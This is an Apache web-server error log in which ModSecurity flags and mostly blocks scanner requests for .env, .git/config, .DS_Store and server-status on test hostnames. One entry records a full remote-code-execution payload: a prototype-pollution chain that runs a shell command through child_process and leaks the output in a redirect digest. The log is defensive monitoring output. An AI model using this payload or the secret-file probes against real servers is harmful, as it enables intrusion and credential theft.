[Fri Dec 26 05:20:28.064288 2025] [:error] [pid 987281] [client 159.65.144.72:37092] [client 159.65.144.72] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aU4NDCvVnPibgfczVvmFSwAAAAY"]
[Fri Dec 26 05:20:28.064514 2025] [:error] [pid 987281] [client 159.65.144.72:37092] [client 159.65.144.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aU4NDCvVnPibgfczVvmFSwAAAAY"]
[Fri Dec 26 05:20:28.064674 2025] [:error] [pid 987281] [client 159.65.144.72:37092] [client 159.65.144.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aU4NDCvVnPibgfczVvmFSwAAAAY"]
[Fri Dec 26 05:20:29.057842 2025] [:error] [pid 987017] [client 159.65.144.72:37100] [client 159.65.144.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aU4NDar0eIi91EsIgJxbTQAAAAI"]
[Fri Dec 26 05:20:29.058060 2025] [:error] [pid 987017] [client 159.65.144.72:37100] [client 159.65.144.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aU4NDar0eIi91EsIgJxbTQAAAAI"]
[Fri Dec 26 05:20:29.058226 2025] [:error] [pid 987017] [client 159.65.144.72:37100] [client 159.65.144.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aU4NDar0eIi91EsIgJxbTQAAAAI"]
[Fri Dec 26 05:20:31.050695 2025] [:error] [pid 987281] [client 159.65.144.72:37114] [client 159.65.144.72] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aU4NDyvVnPibgfczVvmFTAAAAAY"]
[Fri Dec 26 05:20:31.050917 2025] [:error] [pid 987281] [client 159.65.144.72:37114] [client 159.65.144.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aU4NDyvVnPibgfczVvmFTAAAAAY"]
[Fri Dec 26 05:20:31.051064 2025] [:error] [pid 987281] [client 159.65.144.72:37114] [client 159.65.144.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aU4NDyvVnPibgfczVvmFTAAAAAY"]
[Fri Dec 26 05:20:38.478909 2025] [authz_core:error] [pid 987281] [client 146.190.242.161:60918] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 26 05:20:41.481814 2025] [:error] [pid 988810] [client 146.190.242.161:60956] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4NGT-cWeIPLYXGFYe4SwAAAAg"]
[Fri Dec 26 05:20:41.482041 2025] [:error] [pid 988810] [client 146.190.242.161:60956] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4NGT-cWeIPLYXGFYe4SwAAAAg"]
[Fri Dec 26 05:20:41.482196 2025] [:error] [pid 988810] [client 146.190.242.161:60956] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4NGT-cWeIPLYXGFYe4SwAAAAg"]
[Fri Dec 26 05:20:42.479776 2025] [:error] [pid 987018] [client 146.190.242.161:60958] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4NGtEkTE5Ve8fFFN6ojQAAAAM"]
[Fri Dec 26 05:20:42.480018 2025] [:error] [pid 987018] [client 146.190.242.161:60958] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4NGtEkTE5Ve8fFFN6ojQAAAAM"]
[Fri Dec 26 05:20:42.480947 2025] [:error] [pid 987018] [client 146.190.242.161:60958] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4NGtEkTE5Ve8fFFN6ojQAAAAM"]
[Fri Dec 26 05:20:44.480670 2025] [:error] [pid 987021] [client 146.190.242.161:40626] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4NHAALvSk8syxFzC_TAAAAAAU"]
[Fri Dec 26 05:20:44.480904 2025] [:error] [pid 987021] [client 146.190.242.161:40626] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4NHAALvSk8syxFzC_TAAAAAAU"]
[Fri Dec 26 05:20:44.481057 2025] [:error] [pid 987021] [client 146.190.242.161:40626] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4NHAALvSk8syxFzC_TAAAAAAU"]
[Fri Dec 26 06:29:52.303135 2025] [authz_core:error] [pid 988810] [client 143.110.217.244:41432] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 26 06:29:55.304760 2025] [:error] [pid 987017] [client 143.110.217.244:41464] [client 143.110.217.244] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4dU6r0eIi91EsIgJxbZgAAAAI"]
[Fri Dec 26 06:29:55.304971 2025] [:error] [pid 987017] [client 143.110.217.244:41464] [client 143.110.217.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4dU6r0eIi91EsIgJxbZgAAAAI"]
[Fri Dec 26 06:29:55.305120 2025] [:error] [pid 987017] [client 143.110.217.244:41464] [client 143.110.217.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4dU6r0eIi91EsIgJxbZgAAAAI"]
[Fri Dec 26 06:29:56.309172 2025] [:error] [pid 987281] [client 143.110.217.244:41470] [client 143.110.217.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4dVCvVnPibgfczVvmFYwAAAAY"]
[Fri Dec 26 06:29:56.309431 2025] [:error] [pid 987281] [client 143.110.217.244:41470] [client 143.110.217.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4dVCvVnPibgfczVvmFYwAAAAY"]
[Fri Dec 26 06:29:56.309590 2025] [:error] [pid 987281] [client 143.110.217.244:41470] [client 143.110.217.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4dVCvVnPibgfczVvmFYwAAAAY"]
[Fri Dec 26 06:29:58.347161 2025] [:error] [pid 987015] [client 143.110.217.244:41474] [client 143.110.217.244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4dVkk2h_39dq1WaM9dAAAAAAA"]
[Fri Dec 26 06:29:58.347389 2025] [:error] [pid 987015] [client 143.110.217.244:41474] [client 143.110.217.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4dVkk2h_39dq1WaM9dAAAAAAA"]
[Fri Dec 26 06:29:58.347583 2025] [:error] [pid 987015] [client 143.110.217.244:41474] [client 143.110.217.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4dVkk2h_39dq1WaM9dAAAAAAA"]
[Fri Dec 26 08:16:35.778277 2025] [:error] [pid 988136] [client 52.56.110.222:55136] [client 52.56.110.222] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU42U-v3Hrn3TgVA3ktDcAAAAAc"]
[Fri Dec 26 08:16:35.778760 2025] [:error] [pid 988136] [client 52.56.110.222:55136] [client 52.56.110.222] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU42U-v3Hrn3TgVA3ktDcAAAAAc"]
[Fri Dec 26 08:16:35.779667 2025] [:error] [pid 988136] [client 52.56.110.222:55136] [client 52.56.110.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU42U-v3Hrn3TgVA3ktDcAAAAAc"]
[Fri Dec 26 08:16:35.779821 2025] [:error] [pid 988136] [client 52.56.110.222:55136] [client 52.56.110.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU42U-v3Hrn3TgVA3ktDcAAAAAc"]
[Fri Dec 26 08:57:43.551303 2025] [:error] [pid 991428] [client 52.90.11.250:49150] [client 52.90.11.250] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4_93jtNFCAdtpkgKyKOwAAAAk"]
[Fri Dec 26 08:57:43.551571 2025] [:error] [pid 991428] [client 52.90.11.250:49150] [client 52.90.11.250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4_93jtNFCAdtpkgKyKOwAAAAk"]
[Fri Dec 26 08:57:43.552112 2025] [:error] [pid 991428] [client 52.90.11.250:49150] [client 52.90.11.250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4_93jtNFCAdtpkgKyKOwAAAAk"]
[Fri Dec 26 21:01:27.957449 2025] [:error] [pid 998242] [client 45.144.212.58:48364] [client 45.144.212.58] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU7plwALROBby9tuTRJ_twAAAAU"]
[Fri Dec 26 21:01:27.958412 2025] [:error] [pid 998242] [client 45.144.212.58:48364] [client 45.144.212.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU7plwALROBby9tuTRJ_twAAAAU"]
[Fri Dec 26 21:01:27.958606 2025] [:error] [pid 998242] [client 45.144.212.58:48364] [client 45.144.212.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU7plwALROBby9tuTRJ_twAAAAU"]
[Fri Dec 26 23:09:37.999684 2025] [:error] [pid 998243] [client 45.82.13.170:53024] [client 45.82.13.170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU8HoUsyVcj3IzS9rPJ-iwAAAAY"]
